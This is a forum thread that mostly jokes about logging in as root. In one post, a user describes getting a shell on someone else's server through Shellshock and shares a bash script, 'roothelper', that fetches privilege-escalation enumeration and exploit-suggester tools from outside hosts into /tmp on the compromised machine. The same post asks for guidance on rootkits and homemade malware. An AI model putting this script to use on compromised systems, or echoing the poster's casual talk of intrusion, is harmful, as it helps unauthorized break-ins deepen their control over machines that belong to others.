User Controls

I login as root

  1. #1
    My coworkers give me shit for this, but my IQ is so high and my skills so vast that I actually merge with the computer, my brain becomes one with the operating system and I gain full and absolute control. Anyone who uses "sudo" is an inferior mind, but I might cut you some slack if you use NOPASSWD.
  2. #2
    -SpectraL coward [the spuriously bluish-lilac bushman]
    And yet... here you are posting on a sock puppet. There is such a thing called ownership, you know.
  3. #3
    op my friend thinks your inb4lock... please confirm
  4. #4
    Sophie Pedophile Tech Support
    Man i wish i could do that. Hey lock, now that you're here i'd love to see some tech threads penned by you, i don't know if you know this but you're actually the one that got me interested in infosec way back on Zoklet. With regards to threads i know you don't like to write really long threads but if you'd be willing to create some awesome content i'd humbly request it to be on the topics of offensive security, or sec related coding, IDK all the languages you know but i know you're pretty advanced at bash. I've been looking into bash recently as well. I was playing around with shellshock and got an OS shell on this particular server, so then i wanted to root it like a proper hacker should. I found there were a number of enumeration shellscripts and exploit suggesters out there to run on the compromised machine to get a sense of what you're dealing with. I got a python script that searches for shellshock vulnerable hosts so having to manually 'wget' and unzip all the enumeration and exploit suggestion scripts by hand on each as you working the hosts would be a drag. So made a shellscript to automate the process.


    #!/bin/bash

    function usage()
    { printf "%b \a\n\nRoothelper will aid in the process of privilege escalation on a Linux system you compromised by fetching a number of enumeration
    and exploit suggestion scripts. Below is a quick overview of the available options.

    The 'Help' option displays this informational message.

    The 'Download' option fetches the relevant files and places them in the /tmp/ directory.

    The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please
    note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead

    The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper.\n "
    }

    # Download and unzip
    function dzip()
    { echo "Downloading and extracting scripts..."
    `wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
    `wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
    `wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
    `wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
    for zip in *.zip
    do
    dirname=`echo $zip | sed 's/\.zip$//'`
    if mkdir $dirname
    then
    if cd $dirname
    then
    unzip ../$zip
    cd ..
    rm -f $zip
    else
    echo "Could not unpack $zip - cd failed"
    fi
    else
    echo "Could not unpack $zip - mkdir failed"
    fi
    done
    }

    dir="/tmp/"

    usage

    printf "%b" "\a\n\nTo use roothelper please select an option below.:\n"

    PS3='Please enter your choice: '
    options=("Help" "Download" "Download and unzip" "Clean up" "Quit")
    select opt in "${options[@]}"
    do
    case $opt in
    "Help")
    usage
    printf "%b \n"
    ;;
    "Download")
    echo "Downloading scripts to /tmp/"
    `wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
    `wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`
    `wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
    `wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
    printf "%b \n"
    ;;
    "Download and unzip")
    dzip
    printf "%b \n"
    ;;
    "Clean up")
    echo "Removing downloaded files"
    find $dir/* -exec rm {} \;
    printf "%b \n"
    ;;
    "Quit")
    break
    ;;
    *) echo invalid option;;
    esac
    done


    I want your honest opinion on this, personally i thought it was pretty useful for us plebs that can't mind meld with the computer. I'd love to know more bash and it's application in a security setting. Furthermore i'm really interested in malware and not the HunterExploit Kit skidware but homecooked malware of the dankest kind, including rootkits. If you'd be willing to make a thread to grant some insight on these topics i'd be very grateful. Also, an introduction to reverse engineering and exploit development with Immunity Debugger(If you use it) would be greatly appreciated.

    Also Iam asked me to ask you if you'd be interested in setting up a specific kind of hidden service. Thanks man <3
  5. #5
    aldra JIDF Controlled Opposition
    My coworkers give me shit for this, but my IQ is so high and my skills so vast that I actually merge with the computer, my brain becomes one with the operating system and I gain full and absolute control. Anyone who uses "sudo" is an inferior mind, but I might cut you some slack if you use NOPASSWD.

    what about su?
  6. #6
    Lanny Bird of Courage
    I login as www-data

    come at me bro
  7. #7
    EasyDoesIt Tuskegee Airman
    OPs password is "password"
Jump to Top